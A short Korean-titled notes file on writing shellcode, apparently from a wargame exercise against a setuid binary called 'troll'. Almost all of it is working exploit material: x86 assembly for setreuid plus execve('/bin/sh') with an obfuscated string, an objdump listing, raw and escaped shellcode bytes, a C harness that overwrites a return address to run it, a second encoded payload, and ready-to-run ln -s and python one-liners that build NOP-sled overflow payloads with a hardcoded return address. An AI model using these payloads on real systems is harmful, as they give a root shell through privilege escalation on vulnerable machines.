쉘코드 작성
.intel_syntax noprefix
.global main
main:
    //getuid
    xor eax, eax
    mov al, 0x31
    int 0x80

    //setreuid
    mov ebx, eax
    mov ecx, eax
    xor eax, eax
    mov al, 0x46
    int 0x80

    //arg3 : edx
    xor edx, edx

    //arg1 -> "/bin/sh"
    push edx
    mov edi, 0x57621e1e
    add edi, 0x11111111
    push edi
    mov edi, 0x5d58511e
    add edi, 0x11111111
    push edi
    mov ebx, esp
    
    //arg2 -> ecx
    push edx
    push ebx
    mov ecx, esp

    //int
    xor eax, eax
    mov al, 0xb
    int 0x80


08048398 <main>:
 8048398:	31 c0                	xor    %eax,%eax
 804839a:	b0 18                	mov    $0x18,%al
 804839c:	cd 80                	int    $0x80
 804839e:	89 c3                	mov    %eax,%ebx
 80483a0:	89 c1                	mov    %eax,%ecx
 80483a2:	31 c0                	xor    %eax,%eax
 80483a4:	b0 46                	mov    $0x46,%al
 80483a6:	cd 80                	int    $0x80
 80483a8:	31 d2                	xor    %edx,%edx
 80483aa:	52                   	push   %edx
 80483ab:	bf 1e 1e 62 57       	mov    $0x57621e1e,%edi
 80483b0:	81 c7 11 11 11 11    	add    $0x11111111,%edi
 80483b6:	57                   	push   %edi
 80483b7:	bf 1e 51 58 5d       	mov    $0x5d58511e,%edi
 80483bc:	81 c7 11 11 11 11    	add    $0x11111111,%edi
 80483c2:	57                   	push   %edi
 80483c3:	89 e3                	mov    %esp,%ebx
 80483c5:	52                   	push   %edx
 80483c6:	53                   	push   %ebx
 80483c7:	89 e1                	mov    %esp,%ecx
 80483c9:	31 c0                	xor    %eax,%eax
 80483cb:	b0 0b                	mov    $0xb,%al
 80483cd:	cd 80                	int    $0x80
 80483cf:	90                   	nop    


31 c0 b0 31 cd 80 89 c3 89 c1 31 c0 b0 46 cd 80 31 d2 52 bf 1e 1e 62 57 81 c7 11 11 11 11 57 bf 1e 51 58 5d 81 c7 11 11 11 11 57 89 e3 52 53 89 e1 31 c0 b0 0b cd 80 90

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xd2\x52\xbf\x1e\x1e\x62\x57\x81\xc7\x11\x11\x11\x11\x57\xbf\x1e\x51\x58\x5d\x81\xc7\x11\x11\x11\x11\x57\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80


char shell[] = "\x31\xc0\xb0\x18\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xd2\x52\xbf\x1e\x1e\x62\x57\x81\xc7\x11\x11\x11\x11\x57\xbf\x1e\x51\x58\x5d\x81\xc7\x11\x11\x11\x11\x57\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80";
int main()
{
    int *ret;
    *(&ret+2) = (int*)shell;
    return 0;
}


#### shell code
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xd2\x52\xbf\x1e\x1e\x62\x57\x81\xc7\x11\x11\x11\x11\x57\xbf\x1e\x51\x58\x5d\x81\xc7\x11\x11\x11\x11\x57\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80

\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6
####



ln -s ../troll `python -c 'print "\x90"*30 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xd2\x52\xbf\x1e\x1e\x62\x57\x81\xc7\x11\x11\x11\x11\x57\xbf\x1e\x51\x58\x5d\x81\xc7\x11\x11\x11\x11\x57\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"'`
./`python -c 'print "\x90"*30 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xd2\x52\xbf\x1e\x1e\x62\x57\x81\xc7\x11\x11\x11\x11\x57\xbf\x1e\x51\x58\x5d\x81\xc7\x11\x11\x11\x11\x57\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"'` `python -c 'print "\x90"*44 + "\xb3\xff\xff\xbf"'`



\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6

ln -s ../troll `python -c 'print "\x90"*30 + "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'`
./`python -c 'print "\x90"*30 + "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` `python -c 'print "\x90"*44 + "\xb3\xff\xff\xbf"'`